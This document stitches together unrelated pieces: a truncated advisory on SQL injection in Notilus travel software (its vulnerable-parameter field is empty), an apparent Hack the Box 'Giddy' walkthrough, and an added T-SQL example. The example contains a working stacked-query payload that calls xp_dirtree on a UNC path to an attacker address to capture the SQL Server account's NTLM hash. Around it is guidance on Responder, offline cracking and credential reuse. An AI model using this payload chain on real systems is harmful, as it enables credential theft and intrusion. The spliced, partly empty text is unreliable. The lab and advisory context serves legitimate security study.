Exploit Title: Notilus SQL injection
Product: Notilus travel solution software
Affected version: Notilus travel solution software v2012 R3
Vulnerability Type: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')

"DIMO Software is the European leader on the Travel and Expense Management market. We publish the Notilus solution, a simple efficient software to manage the entire business travel process: travel orders, online and offline booking, expense reports, supplier invoices, car fleet, mobile telephones, etc."

The Notilus software is vulnerable to SQL injection attacks, specifically in the password modification fields.

Vulnerable parameter:

Advisory Timeline:
15/02/16 - First contact: vendor requests details of the vulnerability.
03/03/16 - Follow-up to vendor to inquire about availability of a fix.
03/03/16 - Vendor responds that a fix will be available 16/03/16.

Solution: Patch to the latest available 2012 R3 branch or upgrade to version 2016.

Giddy from Hack the Box is being retired this week, so I'll go over the steps to pwn this box. For this one we need to find an easy SQL injection point in the web application, then leverage it to trigger an SMB connection back to our machine and use Responder to capture some hashes. I learned a bit about Web PowerShell while doing this box as I didn't know that even existed.

- There's an SQL injection in the generic products inventory page.
- Using the SQL injection in MSSQL, we can trigger an SMB connection back to us and get the NTLM hash with responder.py.
- The credentials are used to gain access to a restricted PS session through the PowerShell Web Access interface.
- The Ubiquiti UniFi Video service has weak file permissions and allows us to upload an arbitrary file and execute it as SYSTEM.
- A reverse shell executable is compiled, uploaded and executed to get SYSTEM access.

The local privilege escalation used is the published Ubiquiti UniFi Video 3.7.3 - Local Privilege Escalation.

```
Nmap scan report for giddy.htb (10.10.10.104)
80/tcp   open  http          Microsoft IIS httpd 10.0
443/tcp  open  ssl/http      Microsoft IIS httpd 10.0
| ssl-cert: Subject: commonName=PowerShellWebAccessTestWebSite
|_ssl-date: T23:26:04+00:00; -4m42s from scanner time.
3389/tcp open  ms-wbt-server Microsoft Terminal Services
|_ssl-date: T23:26:04+00:00; -4m41s from scanner time.
5985/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
```

Wordlist: SecLists/Discovery/Web-Content/big.txt

```
gobuster -w SecLists/Discovery/Web-Content/big.txt -t 50 -u
```

The main page has nothing interesting on it, just some image of a dog. The /remote URI contains a Windows PowerShell Web Access interface which we'll use later. The /mvc URI is some generic demonstration ASP.NET page with a database backend. We can register a new user but there's nothing interesting we can do with a user vs. The web application simply lists products from the database. There's also a search function that we can use to look in the database.

![](/assets/images/htb-writeup-giddy/mvc1.png)

The 1st SQL injection point is the search field, since we can trigger an SQL error with a single quote. The 2nd SQL injection point is the GET parameter in the product category; we can trigger an SQL error with a single quote there as well.

sqlmap can be used to enumerate the database:

```
sqlmap -u --dbms=mssql --dbs
```

```
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws.
```
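The SQL-injection-to-SMB step summarised in the Giddy writeup above, as an added T-SQL example that is not part of the original post. It reconstructs the sink as concatenated dynamic SQL over a temp table (the `#Products` table, the `ProductName` column and the query shape are assumptions, since the box's real query is not shown), shows why a lone quote produced the SQL error observed in the search field, then the stacked query that makes SQL Server open an SMB session to an attacker host (the listener address `10.10.14.15` and the share name are assumptions), and finally the parameterised form that closes the hole.

```sql
-- Added example, not the writeup's own code. Assumed: a products table, a
-- search box whose value is concatenated into the query, and an attacker
-- listener at 10.10.14.15 (hypothetical address).
CREATE TABLE #Products (ProductName NVARCHAR(100));
INSERT INTO #Products VALUES (N'Dog food'), (N'Dog leash');

DECLARE @search NVARCHAR(200);
DECLARE @sql    NVARCHAR(MAX);

-- 1. The probe from the writeup: a single apostrophe closes the string
--    literal early and leaves the rest of the statement unterminated.
SET @search = N'''';
SET @sql = N'SELECT ProductName FROM #Products WHERE ProductName LIKE ''%'
         + @search + N'%''';
PRINT @sql;   -- ... WHERE ProductName LIKE '%'%'
BEGIN TRY
    EXEC (@sql);
END TRY
BEGIN CATCH
    PRINT ERROR_MESSAGE();   -- Unclosed quotation mark after the character string '%'.
END CATCH;

-- 2. Same sink, stacked query. xp_dirtree walks a UNC path, so SQL Server
--    itself authenticates to the attacker's SMB listener. It is callable by
--    low-privileged logins on a default install, and the connection is made
--    by the SQL Server service account, whose NetNTLMv2 response Responder
--    captures. The trailing -- comments out the application's closing '%'.
SET @search = N''';EXEC master.dbo.xp_dirtree ''\\10.10.14.15\share'';--';
SET @sql = N'SELECT ProductName FROM #Products WHERE ProductName LIKE ''%'
         + @search + N'%''';
PRINT @sql;
-- ... WHERE ProductName LIKE '%';EXEC master.dbo.xp_dirtree '\\10.10.14.15\share';--%'
EXEC (@sql);   -- outbound SMB connection to 10.10.14.15

-- 3. Hardened form: sp_executesql with a typed parameter. The same payload
--    is now a LIKE pattern, not syntax, and no extra batch runs.
DECLARE @safe NVARCHAR(MAX) =
    N'SELECT ProductName FROM #Products WHERE ProductName LIKE ''%'' + @q + ''%''';
EXEC sp_executesql @safe, N'@q NVARCHAR(200)', @q = @search;   -- returns no rows, no connection

DROP TABLE #Products;
```

Start Responder on the interface facing the target before sending the payload (for example `responder -I tun0`). When the payload goes through the HTTP search parameter rather than a SQL session it has to be URL-encoded first. The captured NetNTLMv2 response belongs to the SQL Server service account and has to be cracked offline (hashcat mode 5600) before the credentials can be reused against the PowerShell Web Access login, which is the step the writeup takes next.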